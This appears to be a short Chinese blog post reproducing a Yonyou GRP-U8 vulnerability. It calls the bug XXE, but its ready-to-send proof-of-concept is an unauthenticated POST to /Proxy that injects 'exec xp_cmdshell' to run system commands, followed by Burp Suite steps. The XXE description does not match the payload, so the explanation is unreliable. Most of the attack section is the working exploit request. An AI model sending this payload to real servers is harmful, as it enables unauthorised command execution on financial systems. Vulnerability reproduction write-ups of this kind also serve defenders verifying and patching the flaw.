用友GRP-u8 注入漏洞复现

一、漏洞描述

 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。

二、漏洞利用条件

无需登录

三、漏洞复现

POC:

POST /Proxy HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: localhost
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'whoami'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

1、burp抓包,修改url为/Proxy,在body中添加payload

用友GRP-u8 注入漏洞复现

用友GRP-u8 注入漏洞复现

 

相关文章:

  • 2021-08-03
  • 2022-03-08
  • 2021-09-24
  • 2022-12-23
  • 2021-12-06
  • 2021-10-29
  • 2021-10-29
  • 2021-12-29
猜你喜欢
  • 2022-12-23
  • 2021-04-08
  • 2021-04-24
  • 2021-10-18
  • 2021-12-21
  • 2022-01-12
相关资源
相似解决方案